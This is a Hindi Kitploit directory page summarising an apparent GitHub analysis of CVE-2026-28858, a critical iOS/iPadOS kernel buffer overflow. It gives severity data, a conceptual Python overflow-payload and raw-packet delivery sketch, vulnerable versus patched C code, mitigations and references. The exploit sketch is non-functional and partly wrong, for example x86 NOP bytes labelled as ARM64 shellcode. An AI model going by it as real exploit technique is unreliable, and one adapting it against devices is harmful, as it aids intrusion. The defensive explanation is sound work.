Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-28858 — # CVE-2026-28858 का तकनीकी विश्लेषण Apple iOS/iPadOS कर्नेल में एक गंभीर बफर ओवरफ्लो, जिसमें एक्सप्लॉइट प्रवाह, शमन, और रक्षात्मक कोडिंग उदाहरण शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/kaleth4/cve-2026-28858
आईओएस सुरक्षाभेद्यता विश्लेषणशोषणमोबाइल सुरक्षालर्निंग और शिक्षाबाइनरी शोषण
GitHubkaleth4/cve-2026-28858

CVE-2026-28858

# CVE-2026-28858 का तकनीकी विश्लेषण Apple iOS/iPadOS कर्नेल में एक गंभीर बफर ओवरफ्लो, जिसमें एक्सप्लॉइट प्रवाह, शमन, और रक्षात्मक कोडिंग उदाहरण शामिल हैं।

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

⚠️ CVE-2026-28858 — Apple iOS/iPadOS में बफर ओवरफ्लो

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  गंभीरता: क्रिटिकल  │  CVSS: 9.8  │  CWE-120  │  रिमोट   ║
╚══════════════════════════════════════════════════════════════╝

कोई दूरस्थ उपयोगकर्ता बिना उपयोगकर्ता इंटरैक्शन या विशेषाधिकारों के iOS/iPadOS में सिस्टम की अप्रत्याशित समाप्ति या कर्नेल मेमोरी भ्रष्टाचार उत्पन्न कर सकता है।


📋 तकनीकी विवरण

फ़ील्डमान
CVE IDCVE-2026-28858
EUVDEUVD-2026-15131
प्रकाशित25 मार्च 2026
अंतिम अपडेट26 मार्च 2026
CVSS v3.19.8 / 10 — क्रिटिकल
EPSS0.05%
वेक्टरCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-120 — आकार सत्यापन के बिना बफर कॉपी
स्थितिविश्लेषित — पैच उपलब्ध

🎯 विवरण

Apple iOS और iPadOS में बफर ओवरफ्लो, जो कर्नेल इनपुट प्रोसेसिंग में अपर्याप्त सीमा जांच के कारण होता है।

वास्तविक प्रभाव:

  • सेवा से इनकार (सिस्टम क्रैश)
  • कर्नेल मेमोरी भ्रष्टाचार
  • कर्नेल विशेषाधिकारों के साथ मनमाना कोड निष्पादन की संभावना
  • ज़ीरो-क्लिक: उपयोगकर्ता इंटरैक्शन की आवश्यकता नहीं

⚡ हमले के वेक्टर का विवरण


🔬 तकनीकी विश्लेषण और कोड उदाहरण

CVE-2026-28858 के लिए कोई सार्वजनिक एक्सप्लॉइट मौजूद नहीं है। निम्नलिखित प्रस्तुति अवधारणात्मक है, जो CWE-120 और प्रलेखित हमले वेक्टर पर आधारित है।

1. पेलोड संरचना (ओवरफ्लो)

root@kitploit:~
# ओवरफ्लो का अवधारणात्मक प्रतिनिधित्व
import socket

# 1. आवंटित बफर भरना (~कर्नेल हैंडलर में विशिष्ट 512 बाइट्स)
buffer_fill = b"A" * 512

# 2. ओवरराइट किया गया रिटर्न पता — हमलावर-नियंत्रित क्षेत्र की ओर इशारा करता है
# वास्तविक iOS/iPadOS में: ASLR + PAC (पॉइंटर ऑथेंटिकेशन कोड) बायपास आवश्यक
return_address = b"\x41\x42\x43\x44"

# 3. शेलकोड: NOP स्लेड + ARM64 के लिए दुर्भावनापूर्ण निर्देश
shellcode = b"\x90" * 16 + b"\xeb\x12..."  # NOP स्लेड + पेलोड

payload = buffer_fill + return_address + shellcode

2. डिलीवरी वेक्टर (ज़ीरो-क्लिक)

root@kitploit:~
# बिना उपयोगकर्ता इंटरैक्शन के दूरस्थ डिलीवरी
# उदाहरण: हेरफेर किए गए लंबाई फ़ील्ड वाला नेटवर्क पैकेट

import struct

def craft_malicious_packet(target_ip: str, target_port: int):
    """
    गलत प्रारूप वाले मेटाडेटा वाला पैकेट बनाता है जिसे iOS कर्नेल
    पृष्ठभूमि में प्रोसेस करता है (उपयोगकर्ता UI के बिना)।
    उदा: TLS प्रमाणपत्र, छवि मेटाडेटा, नेटवर्क प्रोटोकॉल फ़ील्ड।
    """
    # प्रोटोकॉल का वैध हेडर
    header = struct.pack(">HH", 0x0001, 0xFFFF)  # type=1, length=OVERFLOW

    # कर्नेल बफर से अधिक पेलोड
    malicious_data = header + payload

    with socket.socket(socket.AF_INET, socket.SOCK_RAW) as s:
        s.sendto(malicious_data, (target_ip, target_port))

3. कर्नेल में निष्पादन (एक्सप्लॉइट प्रवाह)

root@kitploit:~
[नेटवर्क/WiFi/BT] → गलत प्रारूप वाला पैकेट
      ↓
[पृष्ठभूमि में iOS प्रक्रिया] → "लंबाई" फ़ील्ड पढ़ता है = 0xFFFF
      ↓
[memcpy(कर्नेल_बफर, डेटा, 0xFFFF)] → सीमा जांच के बिना
      ↓
[ओवरफ्लो: शेलकोड कर्नेल स्टैक/हीप पर लिखा गया]
      ↓
[प्रोसेसर हमलावर के return_address पर पुनर्निर्देशित]
      ↓
[ring 0 / कर्नेल विशेषाधिकारों के साथ निष्पादन]

4. कमजोर कोड बनाम सही किया गया कोड

root@kitploit:~
/* ❌ कमजोर कोड (पैच से पहले) */
void procesar_entrada(char *datos_usuario, size_t longitud) {
    char bufer_kernel[512];
    memcpy(bufer_kernel, datos_usuario, longitud); // बिना जांच
}

/* ✅ सही किया गया कोड (iOS/iPadOS 26.4) */
void procesar_entrada(char *datos_usuario, size_t longitud) {
    char bufer_kernel[512];

    // सीमा जांच — Apple द्वारा लागू फिक्स
    if (longitud > sizeof(bufer_kernel)) {
        kernel_log("CVE-2026-28858: input truncado [%zu > 512]", longitud);
        return; // कॉपी करने से पहले रोकें
    }

    memcpy(bufer_kernel, datos_usuario, longitud);
}

5. स्टैक कैनरीज़ के साथ पहचान

root@kitploit:~
/* गहराई में रक्षा तंत्र: स्टैक कैनरी */
#include <string.h>

#define CANARY_VALUE 0xDEADBEEFCAFEBABE

void procesar_entrada_segura(char *datos_usuario, size_t longitud) {
    uint64_t canary = CANARY_VALUE;
    char bufer_seguro[512];

    if (longitud > sizeof(bufer_seguro)) {
        log_security_event("Intento de desbordamiento bloqueado");
        return;
    }

    memcpy(bufer_seguro, datos_usuario, longitud);

    // कॉपी के बाद कैनरी अखंडता सत्यापित करें
    if (canary != CANARY_VALUE) {
        panic("Stack smashing detectado — CVE-2026-28858");
    }
}

🛡️ शमन

तत्काल कार्रवाई आवश्यक:

root@kitploit:~
iOS 26.4 / iPadOS 26.4 या बाद के संस्करण में अपडेट करें
  • सेटिंग्स → सामान्य → सॉफ़्टवेयर अपडेट
  • 26.4 से पहले के संस्करण वाले सभी Apple डिवाइसों पर लागू होता है
  • कोई व्यवहार्य वर्कअराउंड मौजूद नहीं — केवल पैच प्रभावी है

📅 समयरेखा

root@kitploit:~
23 मार्च 2026  → प्रारंभिक प्रकाशन (EUVD)
24 मार्च 2026  → Apple सलाहकार #126792 प्रकाशित
24 मार्च 2026  → पहला उल्लेख पहचाना गया (Feedly)
24 मार्च 2026  → स्वचालित विश्लेषण द्वारा CVSS अनुमान
25 मार्च 2026  → NVD ने CVSS 9.8 — क्रिटिकल निर्धारित किया
25 मार्च 2026  → Qualys में पहचान जोड़ी गई (ID: 610773)
26 मार्च 2026  → स्थिति: विश्लेषित

🖥️ प्रभावित सिस्टम

26.4 से पहले के iOS और iPadOS के सभी संस्करण, जिनमें शामिल हैं:

  • iOS 1.0 → 26.3.x
  • iPadOS 12.1 → 26.3.x

संदर्भ दस्तावेज़ में प्रभावित CPEs की पूरी सूची देखें।


🔗 संदर्भ

स्रोतURL
Apple सुरक्षा सलाहकारhttps://support.apple.com/en-us/126792
NVDhttps://nvd.nist.gov/vuln/detail/CVE-2026-28858
CWE-120https://cwe.mitre.org/data/definitions/120.html

⚠️ संबंधित CAPEC वर्गीकरण

  • CAPEC-100 — बफर ओवरफ्लो
  • CAPEC-10 — पर्यावरण चर के माध्यम से ओवरफ्लो
  • CAPEC-14 — क्लाइंट-साइड इंजेक्शन द्वारा प्रेरित बफर ओवरफ्लो
  • CAPEC-8 — API कॉल में बफर ओवरफ्लो
  • CAPEC-92 — बलपूर्वक पूर्णांक ओवरफ्लो

अस्वीकरण: प्रस्तुत कोड केवल शैक्षिक और रक्षात्मक अनुसंधान उद्देश्यों के लिए एक अवधारणात्मक प्रतिनिधित्व है। CVE-2026-28858 के लिए कोई सार्वजनिक एक्सप्लॉइट मौजूद नहीं है।

टूल डाउनलोड करें
पैरामीटरमानविवरण
हमला वेक्टरनेटवर्कदूरस्थ रूप से शोषण योग्य
जटिलताकमकोई विशेष शर्तें नहीं
आवश्यक विशेषाधिकारकोई नहींप्रमाणीकरण की आवश्यकता नहीं
उपयोगकर्ता इंटरैक्शनकोई नहींज़ीरो-क्लिक
दायराअपरिवर्तितकमजोर घटक तक सीमित
गोपनीयताउच्चडेटा तक पूर्ण पहुंच
अखंडताउच्चपूर्ण संशोधन संभव
उपलब्धताउच्चसिस्टम क्रैश